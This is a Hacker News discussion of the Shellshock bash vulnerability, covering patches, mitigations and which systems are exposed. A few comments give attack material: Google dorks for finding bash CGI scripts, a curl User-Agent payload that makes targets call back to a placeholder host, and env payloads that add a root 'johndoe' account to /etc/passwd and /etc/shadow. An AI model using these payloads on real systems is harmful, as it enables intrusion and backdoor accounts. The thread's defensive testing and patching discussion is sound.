You could search for *.cgi scripts indexed by Google. They may not be written IN Bash but maybe one of them opens up a shell to execute a command. Even if you are not explicitly passing any bad data to it, the environment will be passed and trigger this crazy vulnerability.

Makes sense. This just strikes me as a very flexible exploit.

okay, i was wrong, this is way way worse.

Google inurl:cgi-bin inurl:.sh

Yeah, that makes sense. Did you try it?

Gets me ~6k of hits that have just 'sh' in the URL (without the dot), and are not what we're looking for, mostly forum posts asking about how to make a bash cgi-bin. (Answer from the future: don't).

I _think_ putting quotes around the ".sh" is supported to force the result to really have the period before the sh in the url.

inurl:cgi-bin inurl:".sh"

0 hits

    inurl:cgi-bin "inurl:\.sh$"
320k results here. The slash and $ made a difference but they are not parsed as regex other chars work too. Not sure what's going on here.

It is far worse in the sense that it can lead to remote code execution. However, the number of vulnerable sites is far far fewer. Like Heartblead this one will likely have a very long tail of systems remaining vulnerable. My guess is we will see this vulnerability used to compromise big targets in the next few months.

What would be the best way to go if using Debian 5 (lenny)?

The only service exposed is ssh, and no one outside the company has an account. Is it still vulnerable through ssh?

see http://seclists.org/oss-sec/2014/q3/651. can't say i understood much, but the answer i can give is 'likely'.

No, they would need a valid SSH account and password/key.

No update out for Ubuntu Server 14.04 yet.

/edit: the Red Hat blog has a good overview https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

Update for Ubuntu Server 14.04 is available

From just a functionality standpoint, how is even the patched version supposed to work? It seems to undefine the variable:

  % E='() { echo hi; }; echo cry' bash -c 'echo "-$E-"'
  bash: warning: E: ignoring function definition attempt
  bash: error importing function definition for `E'
Since everyone's favorite example seems to be CGI scripts, doesn't this result in the script having no variable, as opposed to just a text one? Suddenly the script can break because an expected variable is no longer present simply because the input had a certain odd looking form?

In fact, if I wanted my variable to be a function, why wouldn't I just explicitly eval it? What's the use case at all for this functionality?

I got tired of the hype. How's the following code for a mitigation?

Basically, if some program does invoke /bin/bash, control first passes to this code which truncates suspicious environment variables. (and it dumps messages to the system log if/when it finds anything...)

The check should match for any variety of white space:


=() {

= ( ) {

etc... but feel free to update it for whatever other stupid things bash allows.

The code is at http://ad5ey.net/bash_shock_fix.c

Simple usage:

cd /bin

gcc -std=c11 -Wall -Wextra bash_shock_fix.c -o bash_shock_fix

mv bash bash.real

ln -s bash_shock_fix bash

phoenix(pts/1):~bin# ls -al bash*

lrwxrwxrwx 1 root root 14 Sep 27 00:23 bash -> bash_shock_fix

-rwxr-xr-x 1 root root 1029624 Sep 24 14:51 bash.real

-rwxr-xr-x 1 root root 9555 Sep 27 00:23 bash_shock_fix

-rw-r--r-- 1 root root 2990 Sep 27 00:23 bash_shock_fix.c


For this to happen the attacker has to control environment variables and then a bash shell is spawned.

Lots of web stuff spawn shells setting environment variables to stuff in HTTP headers. LC_TIME with some time zone settings might be one.

Am I vulnerable if using the Paperclip gem to manage file uploads on a Rails app (it internally fires up 'convert' to generate thumbnails, I believe).

What if there is an haproxy sitting in front of the Rails app?

We have added the CVE to our scanning routines and the update is now online on www.detectify.com. Test your environment for unpatched servers. In times like these it's OK to go for our free plan.

We just released a complete quick-test for #shellshock here: https://shellshock.detectify.com/. It's free to use and here's the information about how the scanner works: goo.gl/8vp6eo

Please feedback here: https://news.ycombinator.com/item?id=8366643

Has the redhat patch been pushed through centos yet?

Apparently, no. When it does, it should appear at http://lists.centos.org/pipermail/centos-announce/2014-Septe... (if you admin CentOS servers, it can be a good idea to subscribe to that list).

Looks like it works. I guess it is okay that after the close quote the command still runs even though it is not terminated

     env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
     bash: warning: x: ignoring function definition attempt
     bash: error importing function definition for `x'
     this is a test

It's out by now for both Centos 6 and 7. Ironically, their Redhat brethren on the Fedora 20 project haven't released an update yet.

My CentOS now says "ignoring function definition attempt" after the upgrade, so I assume CentOS update is now out.

I'm by no means an expert, but am I completely wrong if I think something like this should work on an exploitable system to get a pingback from a vulnerable system without curl ?

  curl -A "() { :; }; echo GET /pingback.php | telnet bashexploitindexer.fake 80" http://expoitablehost.com/blah.cgi

My friend tried it on Heroku - It is affected.

Can someone with mod_security test a regex I wrote that should mitigate this? /\(.?\)\s\{.?\}\s\;/ from testing seems to catch any variants that I can think of that can trigger this bug, but I don't have a machine easily available to me at the moment to test with, unfortunately.

Your regex was damaged by HN's comment formatting. To get it to post correctly, put it on a line with four leading spaces.

Repost, because HN "formatted" it for me

I have qualms against redhat's fix, because it seems like it would create too many false positives, and additionally looks way too easy to work around just by adding spaces, etc.

Those regexes seem a bit too fragile for my liking. Adding an extra space between the paren and the bracket breaks it, naming the function breaks it, etc. Plus it has a bigger chance of triggering false positives. It's an okay emergency fix, but I'm positive one can do better.

Ubuntu has been patched, it appears. If you're on Ubuntu, try this:

sudo apt-get update

sudo apt-get --only-upgrade install bash

At a glance, one interesting use of this is a potential local privilege escalation on systems with a sudoers file which restrict commands which can be run to ones that include a bash script, and allow you to keep some environment variables.

Here's an easy to use and reliable scanner to test if your website is vulnerable. http://milankragujevic.com/projects/shellshock/

so basically turn off AcceptEnv in sshd_config?

Also don't use bash for running any scripts. You never should anyway, in a sane environment /bin/sh should not be bash - in Debian/Ubuntu it is dash which is not vulnerable. Unfortunately the Redhat derived distros do use bash as default /bin/sh. In the BSDs it is a standards compliant posix sh too. bash is for users not scripts.

> in a sane environment /bin/sh should not be bash

Why, other than it is not the shell of the day?

First it encourages people to use bash specific stuff that is non Posix. Second it is a huge bloated bit of code thats ok as user interface, but scripts should use something that is more minimal. To avoid this sort of issue.

> scripts should use something that is more minimal. To avoid this sort of issue.

Are you also against Perl and Python or does this scripts should be minimal only apply to bash?

> First it encourages people to use bash specific stuff that is non Posix

That's not a problem for most people.

These are reasons you don't like bash, not reasons to not use bash.

/bin/sh is the shell called by system(3) and used by portable scripts bundled with packages. Those things can't use anything but standard sh anyway, so having them run bash is overkill. "Don't use bash as your /bin/sh" isn't the same as "don't use bash as your interactive shell" or "don't write bash scripts"

And don't put #!/bin/bash at the top of your scripts.

And don't shell out in eg. Perl, or PHP, or Python, through bash.

Or just take a patched bash.

> In the BSDs it is a standards compliant posix sh too.

In FreeBSD, it is tcsh in sh mode. Bash does the same too when invoked as sh[0]. It's POSIX compliant with extensions. There's still all the shell's code there, it's just that some of it is switched off by default, or its behaviour modified, to be compliant.

[0] http://www.gnu.org/software/bash/manual/html_node/Bash-POSIX...

Dash sucks, bash rocks. Dash isn't even close to being as capable of a shell as Bash.

Anyone able to express how this affects the default client configuration on Mac desktops and servers?

I guess I'll answer one part- so if you run this: $ env x='() { :;}; echo vulnerable' bash -c "echo test" in your terminal, you certainly appear to be vulnerable.

But I'm not knowledgable about all the default scripts that launch things on the mac. It's unclear to me if there are any standard processes on OSX that take advantage of Bash

By the time AcceptEnv has any effect, the user is already logged in and can run whatever they want anyway. If you're allowing untrusted users to authenticate to ssh, then, yeah, sure, but you'd be in a niche (and know it).

Don't forget SSH_ORIGINAL_COMMAND. GitHub and BitBucket had an exciting morning...

I don't think so. From what I've been reading it can be exploited via http requests. I'm sure a metasploit script is right around the corner.

Edit: oh looks like only like mod_cgi related stuff is.. thats good then sort of

It can potentially be exploited via anything that shells out to bash with an environment that contains environment variables with values (that ultimately comes from) an untrusted source.

mod_cgi is just one of the most obvious attack vectors.

Any software where adversary-controlled input can set environment variables which then execs bash is affected. mod_cgi is just really easy to exploit.

For those of us with large clusters and chef, here is a useful knife command for updating bash on debian/ubuntu systems:

knife ssh 'name:*' 'sudo apt-get update && sudo apt-get install -y --only-upgrade bash'

What I'm really worried about now is every single cable modem and router out there, as they are very rarely updated. They run their shit for years. The bigger routers yes, but smaller ones and the modems not.


Also: i was not able to test it yet since i am still on the road, but i belive the Cisco AnyConnect VPN client OS-detection is affected

Interestingly enough ancient BASH version 3.2 on Mac OS X 10.9.5 is not vulnerable:

    $ echo $BASH_VERSION
    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
I manually patched my BASH 4.3 to patch level 25 so it's not vulnerable either.

    $ echo $BASH_VERSION
    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test

Since other people are reporting that their copies of bash 3.2.51 are vulnerable, I suspect that the version of bash that is currently running in that terminal is 3.2.51 and vulnerable, but the version of bash that you are invoking from that vulnerable version of bash is not.

In other words, I suspect that:

    $ echo $BASH_VERSION

    $ bash --version
Will report different version numbers.

If you start a new terminal and try `echo $BASH_VERSION`, you will probably see a different version as well.

Yes - the shell currently running is probably the user's login shell, and the shell in e.g. /usr/local/bin/bash was probably installed by Homebrew or MacPorts.

That could be the reason. I have renamed /bin/bash version 3.2 to /bin/bash3 and copied /usr/local/bin/bash that I build myself to /bin/bash making effectively bash version 4.3 the default login and system shell.

I started bash 3.2 from bash 4.3 so that could be the reason why it is not vulnerable as child process.

Excellent insight!

That's ... weird, since the phrase "ignoring function definition attempt" wasn't added to bash 3.2 until today, with patch level 52.


Your paste indicates patch level 51.

The phrase in question doesn't appear on the internet much at all before today.


I presume that the one search result we see is due to a server that has an incorrect clock (or a time machine).

Hmm, I do see "vulnerable" print when I run that code on Mac OS X 10.9.5 with bash 3.2.51(1)-release.

I have same bash version and yet mine is vulnerable on OS X 10.10.

So proud of myself; my Python has env={} in the call to Popen().

The ultimate whitelist.

And they're executed with sudo but sudo empties out env vars with functions in them on the machines I use. Oldest is RHEL5.

Here is a very simple proof of concept that helped me understand the vulnerability:

  bash-3.2$ anyvariable='() { true; }; echo foo' bash

env x='() { :;}; echo "johndoe:x:0:0::/root:/bin/sh" >>/etc/passwd' bash -c "echo this is just a test"

env x='() { :;}; echo "johndoe:\$6\$eM5eLwRC\$eZhb4x7sf1ctGjN1fXrpsusRHRKTHf/E15OA2Nr4TdTF9F0SS4ousy3WrPCI2ofdNoAonRnNPQ7Ja3FQ/:15997:0:99999:7:::" >>/etc/shadow' bash -c "echo this is just a test"


but this only work from root :/ and johndoe xD

Saved a lot of time again today with salt! $ salt * pkg.install bash refresh=True and then check for right version $ salt * pkg.version bash

Looks like Raspian have updated their bash package with the fix, so my Raspberry Pi is safe.

So if a machine is not running a web server, does that mean that machine is not vulnerable?

It might not be vulnerable, but any context where a user can pass environment variables might be dangerous.

Eg, if you allow ANY environment variables in SSH rsync-only logins, or pass on any variables (for good or bad) in sudo scripts, etc.

No, all sorts of other network-facing systems can be vulnerable. Anything that ends up shelling out might pass some environment variables causing the problem. These things pop up in surprising places.

No. Apparently ssh might be vulnerable.

Saucy wasn't patched by the time I did a do-release-upgrade a while ago.

Don't forget to update your docker containers and restart them.

The patch: ftp://ftp.cwru.edu/pub/bash/bash-4.3-patches/bash43-025

All the explanations of why this is bad seem to involve CGI. Didn't the CGI interface die in the 90's? Who uses that nowadays?

Though it's no doubt rickety, conceptually I really like CGI. Talk about loose coupling.

FreeBSD appears to be affected.

...if you've installed bash from ports. The base system doesn't appear to be affected.

The base FreeBSD installation comes with 2 shells - tcsh and sh (not bash!). However many do install bash.


A default installation of FreeBSD is not affected, as FreeBSD does not have bash installed by default.

Someone please ELI5 (Explain Like I'm 5)?

You're very likely pwned. Upgrade immediately.

Free BashBleed logo for tech journalists - http://i.imgur.com/ilJbM74.png

You're not funny.

I have a feeling this is blown out of proportion. Who's running bash setuid exactly? Right. Who's running shell CGIs today? Right.

So.. who has an example of common scripts that are executed remotely in most servers while accepting remote environment? Til then, the panic seems unjustified...

Google brings up 410 .bash CGIs. Every one of them is almost guaranteed to be vulnerable at this point. Of the 1.2 million .sh CGIs, some are surely vulnerable. By this time, many of them are already be in the process of being owned.

CGIs are likely the smallest piece of the vulnerable hosts here. This is going to stick around as a local vulnerability on the plentiful supply of under-patched Linux boxes for a long time.

thats a really small number of servers actually.. i mean ppl get owned every day, every minute. theres a bunch of more easily exploitable local bugs that actually elevate your privileges.

this one bug DOES NOT elevate privs. you need a service that passes unsanitized env vars (unchecked user input) to bash with another user id than yours.

GitHub? I'm reminded of


Of course that was fixed a long time ago, but I wonder what other systems are just a thin veneer over pretending the user controls a shell.

Even if the malicious code doesn't have superuser context, it can do damage to whatever context it is running under. If it's running as www-data, it can trash all your www-data-owned files. Or send your www-data-owned password files somewhere, etc. Unprivileged code can also attack other systems (firewalls permitting); you don't have to be root on system A, to be part of a bot net which attacks system B. Denial-of-service havok can be wreaked from a regular user context, too. Not to mention privacy violations. Pretty much all browser-related security and privacy issues are user space!

As I understand this, any CGI script could be affected. Even if written in a different language if it turn does an os.system (or equivalent). More info here: https://securityblog.redhat.com/2014/09/24/bash-specially-cr... The permissions would only be as the web server user, but that allows all sorts of things to be run that are quite dangerous (resource exhaustion, attacking remote machines, downloading code and running it)

You would still need to be able to pass arbitrary data to the bash command, and if your php (or whatever) script does that, you have a lot of other potential problems to worry about.

RedHat security says:

> PHP scripts executed with mod_php are not affected even if they spawn subshells.


Because of the way cgi works you could just set a user agent or other http header to contain an 'rm' or'nc' command or something in to download and run an attack tool. E.g. You could run netcat to listen on a port or connect out to an attacker's system to provide a connection into an otherwise firewalled database server

Yes, you're right. We have perl running on our server, and I just verified that it is vulnerable if any shell scripts are run from perl. However I just quickly switched on modperl, and I verified that it is now not affected. (According to Redhat, mod_perl and php are not affected, but it's good to verify).

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact